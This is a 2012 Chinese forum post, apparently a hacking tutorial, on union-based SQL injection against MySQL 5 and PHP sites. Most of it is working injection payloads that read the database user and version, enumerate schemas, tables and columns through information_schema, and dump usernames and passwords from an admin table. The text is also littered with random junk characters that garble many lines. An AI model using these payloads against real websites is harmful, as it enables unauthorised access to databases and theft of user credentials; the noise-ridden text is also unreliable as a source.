( m# b5 {( U- o+ H! t, o教程内容:Mysql 5+php 注入7 m+ ~/ k% Y" v8 J& C
: g* X# J8 u5 q0 u7 P/ b
5 h& Q5 o1 J* T2 `9 E! R9 b9 L
% P5 U* Z. m+ H" _一.查看MYSQL基本信息(库名,版本,用户)
9 Q9 h) Z& O* @' {" z2 K+ x7 p; z
8 a! O# k, T% M8 ~' Sand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*' [8 q3 L u D9 @$ v8 C, v
' h% h- M2 N1 q& C0 _/ o二.查数据库# W+ z! M6 j8 F, j. N0 s
7 x$ Q. b, H' p' j$ _
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
; {& k9 [( t( Y1 H& G, k" Xlimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
6 |( [% C* m& I* a5 K- y7 G
1 v& K5 j4 m( e+ L _1 [$ Q: }$ k三.暴表5 ~ M3 z: j8 u1 k' u- T) e1 B
. F g6 M |' i: |0 m6 G' L- sand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*" _6 h- ~1 o8 Y; ?. V% _
- a; o$ G e) m* l/ Nlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
2 I( t' ^5 i5 x( J5 @
8 M! D7 E4 g) |- Z) i' x四.暴字段
, _8 I* [8 ]/ m7 _, I, i1 f) a) E8 R8 |9 c
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*& y5 ~8 e, Q) t2 d, v# K6 K) C
8 _. [* e9 q/ C$ t/ x! k( Mlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
" I, x! ^6 D; l5 T4 Q8 k1 G" z: g9 z, k0 Y' B6 @6 q4 V0 v
五.暴数据
& G" L) v( L P. T. X9 @# g: i$ I$ P
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
7 `$ @0 v# ` p3 M
! L3 Z, S5 q$ \2 f% W" ~ C" p; Y9 ^- b- O$ ~
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。* e( i: I7 F# V- P3 E0 f ~5 L
|
发表于 2012-9-13 16:27:53
收藏
支持
反对